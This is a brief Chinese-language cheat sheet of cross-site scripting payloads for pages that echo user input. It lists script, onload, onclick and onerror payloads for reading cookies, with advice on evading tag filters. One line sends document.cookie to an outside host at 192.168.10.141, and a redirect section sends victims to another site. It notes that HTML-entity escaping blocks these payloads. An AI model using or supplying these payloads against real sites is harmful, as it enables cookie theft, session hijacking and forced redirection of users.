取cookie:
适合场景 有输入框并echo输入值
对方过滤的手段包括replace你的标签,用正则直接过滤标签,可尝试拼接标签和换标签
1.<script>alert(document.cookie)</script>
2.<body οnlοad=alert(document.cookie)>
3.<a href='' οnclick=alert(document.cookie)>click1</a>? ?
4.<img src=http://192.168.10.128/a.jpg οnerrοr=alert(document.cookie)> 给个错误地址,利用报错输出cookie
<script>new Image().src="http://192.168.10.141/a.php?output="+document.cookie;</script>
注意:参数如果进行html实体转义,就无法利用XSS漏洞了
如上面的htmlspecialchars函数直接将参数变成html实体,xss失效
重定向:
1.<script>window.location='http://www.163.com'</script>
2.<iframe src='http://www.163.com' height='1000' width='1500'><iframe>
3.<body οnlοad=window.location='http://www.163.com'>
4.<a href='http://www.163.com'>click1</a>? ?
5.<img src=http://192.168.10.128/a.jpg οnerrοr=window.location='http://www.163.com'> ?